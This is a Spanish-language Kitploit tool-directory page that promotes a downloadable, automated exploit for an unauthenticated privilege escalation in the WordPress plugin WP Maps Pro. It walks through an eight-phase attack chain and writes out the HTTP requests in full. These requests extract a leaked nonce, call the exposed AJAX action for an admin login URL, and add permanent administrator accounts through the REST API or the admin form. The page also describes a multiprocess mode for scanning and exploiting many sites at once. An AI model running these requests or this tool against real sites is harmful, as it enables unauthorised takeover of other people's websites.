Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-8732 — Exploit automatizado de 8 fases para CVE-2026-8732, una escalada de privilegios no autenticada en WP Maps Pro ≤ 6.1.0. Usa multiprocessing y asyncio para escanear objetivos, extraer nonces y crear cuentas de administrador. | Kitploit
Herramientas/GitHubGitHub/zycoder0day/cve-2026-8732
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

Exploit automatizado de 8 fases para CVE-2026-8732, una escalada de privilegios no autenticada en WP Maps Pro ≤ 6.1.0. Usa multiprocessing y asyncio para escanear objetivos, extraer nonces y crear cuentas de administrador.

Ver Repositorio
24hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — Escalada de Privilegios sin Autenticación

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

Automatización de Explotación en 8 Fases | Multiprocessing + Asyncio | Creación de Admin Verificada


🎯 Acerca de la Vulnerabilidad

El plugin de WordPress WP Maps Pro versión ≤ 6.1.0 tiene una vulnerabilidad de escalada de privilegios sin autenticación. Un atacante sin credenciales puede crear una cuenta de administrador y tomar el control total del sitio.

La vulnerabilidad se origina en la función "Temporary Access" diseñada para el equipo de soporte del proveedor FlipperCode, pero está expuesta al público sin la protección adecuada.

InformaciónDetalle
CVECVE-2026-8732
CVSS9.8 (CRÍTICA) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
PluginWP Maps Pro (wp-google-map-gold)
ProveedorFlipperCode
Versiones Afectadas≤ 6.1.0
Versión Parcheada6.1.1
TipoAutenticación Ausente para Función Crítica (CWE-306)
ImpactoCreación de admin sin autenticación → control total del sitio
Autor del PoCXENON1337

🔥 Tres Debilidades Relacionadas

┌──────────────────────────────────────────────────────────────┐
│  DEBILIDAD 1 — Endpoint Expuesto Sin Autenticación         │
│  ▸ La acción AJAX se registra con wp_ajax_nopriv_           │
│  ▸ Cualquiera puede acceder sin iniciar sesión              │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  DEBILIDAD 2 — Nonce Filtrado en Página Pública             │
│  ▸ El objeto wpgmp_local.nonce se incrusta en cada página   │
│  ▸ El atacante puede extraer el nonce del código fuente HTML│
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  DEBILIDAD 3 — Sin Verificación de Permisos                │
│  ▸ La función callback solo verifica el nonce               │
│  ▸ No hay current_user_can() — sin otra defensa             │
└──────────────────────────────────────────────────────────────┘

⚡ Cadena de Ataque — 8 Fases

  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 1  │──▶│ FASE 2   │──▶│ FASE 3   │──▶│ FASE 4   │
  │ RESOLVER│   │ VERIFICAR│   │ DETECTAR │   │ VERSIÓN  │
  │ HTTPS?  │   │ WP       │   │ PLUGIN   │   │ ≤6.1.0?  │
  │ HTTP?   │   │ wp-content│   │ wpgmp_   │   │ WAF?     │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ VULNERABLE
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │                    FASE 5 — EXTRACCIÓN DE NONCE          │
  │                                                          │
  │  GRUPO A (API)        GRUPO B (Contenido)   GRUPO C     │
  │  ├─ M1: REST pages    ├─ M4: Sitemap XML   └─ M7: Slug  │
  │  ├─ M2: REST search   ├─ M5: Enlaces homepage  Brute    │
  │  └─ M3: rest_route    └─ M6: feed RSS/Atom    Force     │
  │                                                          │
  │  Objetivo: wpgmp_local.nonce = "fc-call-nonce"           │
  └──────────────────────────┬───────────────────────────────┘
                             │ NONCE ENCONTRADO
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 6   │──▶│ FASE 7   │──▶│ FASE 8   │
  │ EXPLOTAR │   │ VERIFICAR│   │ AÑADIR   │
  │ POST AJAX│   │ URL      │   │ ADMIN    │
  │ nonce+   │   │ Mágica   │   │ PERMANENTE│
  │ check_   │   │ Cookie   │   │ REST API │
  │ temp=false│   │ login    │   │ WP-Admin │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ ADMIN CREADO
                               Login: wp_xxxx / pass
                               Rol: administrator

Detalle de Cada Fase

FaseNombreFunciónSolicitudes
1ResolverElegir HTTPS/HTTP en paralelo1
2Verificar WPConfirmar que el objetivo es WordPress0
3Detectar PluginBuscar indicadores de WP Maps en 3 capas0-4
4Versión + WAFLeer readme.txt / CSS ?ver= + detectar WAF1
5Extracción de Nonce7 métodos de búsqueda en 3 grupos paralelos0-150
6ExplotaciónPOST a admin-ajax.php → crear cuenta admin temporal1
7VerificaciónAcceder a URL mágica → confirmar sesión admin2
8Añadir AdminREST API (principal) + formulario WP-Admin (respaldo)4

🛠️ Métodos de Ataque

Método 1: Explotación Principal — Creación de Admin Sin Autenticación

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<NONCE_EXTRAÍDO>
check_temp=false

Respuesta si es vulnerable:

{"url":"https://target.com/?wpgmp_access=abc123def456"}

Esta URL mágica otorga inicio de sesión automático como fc_user_XXXXX (rol: administrator).

Método 2: Añadir Admin Permanente vía REST API

POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

Método 3: Añadir Admin vía Formulario WP-Admin (Respaldo)

POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- CLAVE: confirmar contraseña débil
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

Punto clave: pw_weak=1 es obligatorio — WordPress rechaza contraseñas débiles sin este parámetro.


📐 Arquitectura

CVE-2026-8732.py
│
├── 📦 NonceFinder — Buscador de nonce con 7 métodos
│   ├── Grupo A (API): M1 REST pages, M2 REST search, M3 rest_route
│   ├── Grupo B (Contenido): M4 Sitemap, M5 Enlaces homepage, M6 feed RSS
│   └── Grupo C (Fuerza Bruta): M7 Slug brute force (30+ slugs comunes)
│
├── ⚔️ Exploiter — Motor de explotación de 8 fases
│   ├── resolve()           → Fase 1: Selección de protocolo
│   ├── check_wp()           → Fase 2: Verificación de WordPress
│   ├── detect_plugin()      → Fase 3: Detección de plugin + nonce temprano
│   ├── detect_version()     → Fase 4: Detección de versión + WAF
│   ├── exploit()            → Fase 6: Explotación principal
│   ├── verify()             → Fase 7: Verificación de inicio de sesión admin
│   └── add_admin()          → Fase 8: Añadir admin permanente
│
├── 🔧 Worker Process — Procesos trabajadores multiproceso
│   ├── producer()           → Leer dominio desde mp.Queue
│   └── consumer() (N)       → Ejecutar escaneo en paralelo
│
└── 🖥️ Scanner — Interfaz de usuario
    ├── single()             → Modo objetivo único (interactivo)
    └── multi()              → Modo multi-objetivo (masivo)

Flujo de Datos

Descargar herramienta